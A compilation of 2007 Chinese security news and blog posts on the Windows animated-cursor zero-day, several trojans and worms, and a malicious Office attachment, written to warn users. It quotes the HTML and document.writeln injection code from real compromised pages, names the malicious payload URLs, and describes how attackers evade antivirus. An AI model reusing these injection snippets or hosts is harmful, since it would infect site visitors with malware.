警惕微软动画光标暴露的漏洞

警惕微软动画光标暴露的漏洞

作者：金山　来源：赛迪网

3月29日，微软动画光标曝漏洞，同一时间，金山毒霸反病毒专家发现利用此漏洞的恶意攻击代码正在国内互联网中广泛传播。有此漏洞的Windows用户一旦登陆被植入恶意代码的网站，将自动下载大量病毒，从而遭受严重威胁。

金山毒霸反病毒专家戴光剑表示，该漏洞出在Windows 处理动画光标的方式上，该漏洞将影响包括Vista在内的Windows 所有版本。黑客通过带有恶意计算机代码的Web网页或电子邮件就可以利用该漏洞大肆传播病毒。而微软也已经确认此最新漏洞，但由于目前还没有推出相关的补丁，所以危险程度相当高。

截止到目前为止，国内已有十几家网站被黑客植入了恶意代码，用户一旦访问这些被黑客恶意篡改的网页，恶意程序将被自动下载到用户的IE临时目录中并得到执行。

金山毒霸反病毒专家提醒广大用户，提高自身的网络安全意识，不要登陆一些不知名的小网站；在打开陌生邮件以及IM聊天工具中传送的网络链接前，一定要开启杀毒软件的防火墙、实时监控等功能；关注微软补丁的发布时间或采用金山毒霸主动漏洞修复功能进行修补。

警惕新的鼠标指针文件漏洞，可能允许远程执行任意代码（windows 0day漏洞？）

这几天，我们在分析国内一些被挂马的网站的时候，发现一种新的网页挂马方式出现。

这些挂马网页利用鼠标指针文件下载并运行恶意程序，当用户访问嵌入了恶意代码的网页，恶意程序将被自动下载到用户的IE临时目录并得到执行。经海色分析，这很可能是一个新的漏洞，与MS05-002类似。由于目前微软尚未发布相关补丁，所以此漏洞威胁较大，如果恶意代码被广泛应用，近期通过挂马网页感染病毒的用户将陆续增加。

具体例子：

http://www.cw988.cn/jpg.htm

内容：具体例子：

http://www.cw988.cn/jpg.htm

内容：

＜!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4．0 Transitional//EN"＞

＜HTML＞＜HEAD＞＜META http-equiv=Content-Type content="text/html; charset=big5"＞

＜META content="MSHTML 6．00．2900．3059" name=GENERATOR＞＜/HEAD＞

＜BODY＞ ＜DIV style="CURSOR: url('http://www2．cw988．cn/1．jpg')"＞

＜DIV style="CURSOR: url('http://www2．cw988．cn/2．jpg')"＞＜/DIV＞＜/DIV＞＜/BODY＞＜/HTML＞

打开网页时http://www2．cw988．cn/1．jpg和http://www2．cw988．cn/2．jpg这两个图片将作为鼠标指针

然而，这真的只是两个一般的图片吗？

最简单的判别方法：将这两个图片下载下来，另存为.txt文件，再用记事本打开，你看到了什么？

在最后，http://www2.cw988.cn/avp.exe这个URL地址赫然在目！

当用户打开这个网页，或打开用框架等方法内嵌了这个网页的网站之后，这两个鼠标指针便会起作用，http://www2.cw988.cn/avp.exe将被下载到本机IE临时文件夹中并被运行。

另一个例子，就是昨天刚刚提到的木蚂蚁软件站被挂马时，该黑客使用连到含有恶意代码的网页：

http://web.77276.com/adv.js?showmatrix_num=056

今天该网页新增内容：

document.writeln("＜!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\"＞");

document.writeln("＜HTML＞＜HEAD＞");

document.writeln("＜META http-equiv=Content-Type content=\"text\/html; charset=big5\"＞");

document.writeln("＜META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR＞＜\/HEAD＞");

document.writeln("＜BODY＞ ");

document.writeln("＜DIV style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao1.jpg\')\"＞");

document.writeln("＜DIV ");

document.writeln("style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao2.jpg\')\"＞＜\/DIV＞＜\/DIV＞＜\/BODY＞＜\/HTML＞")

同样是将两个jpg文件设置成的鼠标指针图案，而这两个文件的后部指向的URL地址，与之前一样，为http://do.77276.com/0.exe

附：

C.I.S.R.T的blog上文章：

http://www.cisrt.org/blog/read.php?301

微软对之前一个同类漏洞MS05-002描述的相关页面：

Microsoft Security Bulletin MS05-002

Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711)

小聪感言：

当一般用户对“打开图片时会中毒”这种想法感到不可思议时，可能会被告知“把一个病毒exe程序和一个图片文件捆绑在一起，是非常简单的”。事实是如此，而且绝不仅仅是如此。从代码汇编级别入手，利用各式各样的溢出漏洞的方式，才是系统用户的噩梦。

特别是中国国内的黑客们，绝不能说他们缺乏想象力和创新性。实际上，各种各样的层出不穷的恶意代码加密方法，各种各样不同方式的漏洞利用方法，都是中国黑客创造性的极好体现。

从大处看，当MS06-014玩腻了，就换了MS07-004，甚至于“智能化判断”，先做一个MS06-014漏洞的测试，有这个漏洞的时候，便直接连到利用这个漏洞的网页。而无这个漏洞的时候，再依照操作系统的不同，分别连接到利用MS07-004漏洞的网页。而现在，这个鼠标指针文件的漏洞，又被中国黑客采用了，而些这个漏洞很可能是还未公开的，至今微软仍未发布相关补丁。

从小处来看，黑客们绝对不缺乏对付杀毒软件的技巧。从MS06-014漏洞利用代码的变化就可以看出。当瑞星的IE保护出来的时候，黑客闻风而动。在MS06-014漏洞利用代码上一个小小的改变，把直接运行.exe文件的行为，换成了本地创建或远程下载.vbs文件，利用.vbs文件中的代码来运行已下载的.exe文件，以利用IE保护不检测.vbs文件运行的特点，绕过IE保护。现在又出新招，不再由IE来运行了，而是转为用cmd.exe /c命令来运行，进一步逃避安全软件的监视。

以上的这一切，国内黑客的表现要比国外活跃得多了。

而现在这个鼠标指针文件漏洞，就更是体现了“社会工程学”的特点。单从百度空间上，我们就会发现很多百度空间加入了个性化的鼠标指针图标设置，包括我自己的blog也是这么做的。然而这卡通有趣的鼠标指针图案，一旦被人动了手脚，就成了这个用户防不胜防的安全漏洞。

新的漏洞利用方式出现了，网页挂马更加多层次和富于变化，进一步冲击普通用户的安全底线，同时也给反病毒厂商和民间反病毒者们提出了新的挑战。

近日在一些国内被挂马网站上发现了新的“形式”，利用鼠标指针文件下载并运行恶意程序，当用户访问嵌入了恶意代码的网页，恶意程序将被自动下载到用户的IE临时目录并得到执行，从我们目前收到的几个.ani样本看，可能这是新的鼠标指针漏洞，与

MS05-002

类似。由于目前MS尚无补丁发布，所以此漏洞威胁较大，如果恶意代码被广泛利用，近期通过挂马网页感染病毒的用户将陆续增加。

同时我们看到国外也有类似的情况出现：

McAfee:

Exploit-ANIfile.c

Unpatched Drive-By Exploit Found On The Web

TrendMicro:

TROJ_ANICMOO.AX

相关链接：

MS05-002

Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711)

2007-03-29 23:25 更新：

新漏洞信息，FrSIRT:Microsoft Windows Cursor and Icon Format Handling Remote Code Execution Vulnerability。

MSN传播后门程序微软又现Excel图标蠕虫

作者：joy　来源：51CTO.c

在今天的病毒中“鼠星”变种、“代理木马”变种、“MSN幽灵”变种和“Excel拷贝虫”变种值得关注。"鼠星”变种cs是一个专门窃取各种网戏（如“天堂”、“仙境传说”、“热血江湖”等）玩家帐户、密码等机密信息的木马。“代理木马”变种ln是一个利用被感染的计算机转发垃圾邮件的木马。“MSN幽灵”变种A(Win32.Hack.ShadowBot.a)是一个通过MSN传播的后门黑客程序。“Excel拷贝虫”变种A(Worm.VVflag.a)是一个会伪装成Excel图标的蠕虫病毒。

病毒名称：Trojan/PSW.Maran.cs

中 文 名：“鼠星”变种cs

病毒长度：可变

病毒类型：木马

危害等级：★

影响平台：Win 9X/ME/NT/2000/XP/2003

Trojan/PSW.Maran.cs“鼠星”变种cs是一个专门窃取各种网络游戏（如“天堂”、“仙境传说”、“热血江湖”等）玩家帐户、密码等机密信息的木马。“鼠星”变种cs运行后，以任意文件名自我复制到Windows目录下，并在系统目录下释放*.dll文件，文件名随机生成。修改注册表，实现开机自启。终止与安全相关的进程，降低被感染计算机上的安全设置。记录用户键盘操作，窃取各种网络游戏玩家密码等机密信息，并将窃取的信息发送到黑客指定的站点。

病毒名称：TrojanProxy.Agent.ln

中 文 名：“代理木马”变种ln

病毒长度：可变

病毒类型：木马

危害等级：★★

影响平台：Win 9X/ME/NT/2000/XP/2003

TrojanProxy.Agent.ln“代理木马”变种ln是一个利用被感染的计算机转发垃圾邮件的木马。“代理木马”变种ln运行后，终止某些杀毒软件和防火墙的服务。创建文件svchost.exe，并自我注入到该进程里，逃避杀毒软件的查杀。修改注册表，躲避Windows防火墙的监视。窃取被感染的计算机上有效的邮箱地址，并将地址加密压缩，通过UDP 7975端口发送到黑客指定站点。开启后门，允许黑客未经授权访问用户计算机，通过TCP 80端口连接指定IRC服务器，利用被感染的计算机转发垃圾邮件。从黑客指定站点下载其它盗号木马，并在被感染的计算机上自动运行。另外，“代理木马”变种ln还可以利用网络共享进行传播。

“MSN幽灵”变种A(Win32.Hack.ShadowBot.a) 威胁级别：★

该病毒是近来网络流行的另一个恶意后门程序,它会通过网络聊天工具MSN给好友发送病毒压缩包,并以“我的新照片册子”等留言诱导用户打开该病毒包。若用户打开该压缩文件，它会立即释放一个后门程序，黑客便可以完全接管受感染电脑的所有功能，进行多个危害性操作，盗取电脑上的有效信息。由于它利用热门聊天软件进行传播，可能会造成短时间内的病毒的大面积扩散，甚至涉及国内外，严重破坏互联网的安全秩序。该病毒会通过MSN发送“Hey wanna see my new photo album?”和“hey man accept my new photo lbum..等相关内容。病毒包“photo zip”解压运行后，会释放rdshost.dll病毒文件，同时连接如下IRC服务器，完全受控于黑客。

“Excel拷贝虫”变种A(Worm.VVflag.a) 威胁级别：★

该病毒再出现新变种，跟之前的版本相似，它会利用用户电脑上Excel图标来伪装自身，使用户将它误以为是正常的Excel程序。当用户点击该图标时病毒就会自动运行，然后它会连接本地数据库，获取相关有效的数据信息。给用户的电脑的信息安全及隐私数据构成巨大的威胁。该病毒运行后，会把自身复制为session.exe等多个病毒。修改注册表，实现随开机自动启动。同时在每个磁盘根目录释放xls.exe和AUTORUN.INF病毒文件，当点击Excel图标，病毒便可自动运行。针对以上病毒，51CTO安全频道建议广大电脑用户：最好安装专业的杀毒软件进行全面监控。建议用户安装反病毒软件防止日益增多的病毒，用户在安装反病毒软件之后，应该经常进行升级、将一些主要监控经常打开（如邮件监控）、内存监控等，遇到问题要上报， 这样才能真正保障计算机的安全。建立良好的安全习惯。对一些来历不明的邮件及附件不要打开，不要上一些不太了解的网站、不要执行从Internet下载后未经杀毒软件处理的文件，这些才能确保您的计算机更安全。

1、请立即升级杀毒软件，开启高速杀毒引擎及各项监控，防止目前盛行的病毒、木马、有害程序或代码等攻击用户计算机

2、网络版的用户请及时升级控制中心，并建议相关管理人员在适当时候进行全网查杀病毒，保证企业信息安全

3、开启杀毒软件的“系统监控”功能，从注册表、系统进程、内存、网络等多方面对各种操作行为进行主动防御，可以第一时间监控未知病毒

入侵，全方位保护用户计算机系统安全

4、请勿随意打开邮件中的附件，尤其是来历不明的邮件

5、企业级用户可在通用的邮件服务器平台开启监控系统，在邮件网关处拦截病毒，确保邮件客户端的安全

6、怀疑已中毒的用户可使用免费在线查毒进行病毒查证

作者表示歉意但未能清除中国熊猫蠕虫

InfoWorld 【转载】

熊猫烧香不但肆虐在国内，在国外也是赫赫有名，据InfoWorld报道，Symantec的工程师Hon Lau在其blog中写道，作者Li Jun将蠕虫代码出售获利大约12876美元，使之传播开来。虽然其已经被拘捕，并表示道歉，但熊猫蠕虫所引发的损失已经无可挽回。并且，他在看守所中编写的代码未能有效阻止熊猫蠕虫的传播，很明显，编写一个病毒远远比挽回它的损失更简单。

病毒情书邮件藏温情 不爱红颜爱QQ！

DoNews 【转载】

“情书”充满了情人间的浓情蜜语，每个收到情书的人都会沉醉其中，而张小姐收到的这封“情书”却让她怎么也不能与“甜蜜”二字联系起来。

　　“今天我收到了一封邮件，附件中有一个名字为ILOVEYOU的word文档，我以为是谁发错了的情书，点开一看什么内容都没有，就在我纳闷的时候，杀毒软件就提示我，我的电脑已经感染了木马病毒，真是太可怕了！”张小姐说道。

　　据北京网络行业协会联合江民科技发布的反病毒播报资料显示，张小姐电脑中的是一种专盗QQ号的木马病毒（Trojan/PSW.QQPass），这个Word的文档是一个利用Office安全漏洞的恶意文档，如果用户的Office没有打过补丁，打开文档时就会自动释放并执行该木马病毒，盗取用户的QQ账号。

　　“Office文档在大多数网民的印象中是安全的、可靠的，给Office打补丁的用户要远远低于给Windows、IE打补丁的用户，甚至有很多用户从来都不知道需要给Office打补丁，更不知道电脑中有那些地方存在漏洞，这也就给了病毒制造者们利用该漏洞制造病毒的机会。因此及时检查系统漏洞，下载安装更新补丁就显得颇为重要。”江民反病毒专家何公道介绍道。

　　专家建议广大用户，不要随意打开陌生邮件，对有诱惑性标题的邮件尤为要提高警惕，上网时一定要打开杀毒软件的网页监控与邮件监控功能，及时升级杀毒软件病毒库。此外，由于大多数病毒都是针对系统漏洞编写的，因此用户要定期对电脑系统进行漏洞检查，及时下载安装漏洞补丁，江民杀毒软件的“系统漏洞检查”功能，可以有效地监测出系统存在的安全漏洞，并提供相应的补丁下载地址，用户可以直接下载补丁修补漏洞，不给病毒以可乘之机。

　　同时专家还指出，目前通过攻陷存在漏洞的网站在网页上种植木马已经成为黑客传播病毒的惯用手段，用户直接点击被恶意挂马的网站即可中毒，为了有效地遏制病毒的蔓延，江民公司特开展了“春天网络安全之旅”活动，推出“系统监测” 和“网页滤毒”两大技术，从根源上堵住病毒来源，确保电脑用户上网浏览网页安全。